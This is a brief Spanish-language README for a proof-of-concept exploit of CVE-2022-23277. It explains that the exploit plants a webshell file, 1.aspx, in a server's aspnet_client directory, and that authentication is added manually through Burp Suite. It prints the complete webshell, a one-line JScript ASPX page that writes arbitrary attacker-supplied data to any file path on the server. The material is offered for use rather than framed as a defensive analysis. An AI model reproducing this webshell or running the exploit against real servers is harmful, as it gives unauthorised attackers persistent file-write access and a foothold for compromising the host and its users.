
CVE-2022-23277 POC para escribir una webshell a aspnet_client
La parte de autenticación debe agregarse manualmente a través de Burp Suite. Después de una explotación exitosa, se escribirá 1.aspx en aspnet_client.
Webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
Para más detalles sobre la explotación, consulte nuestro artículo.
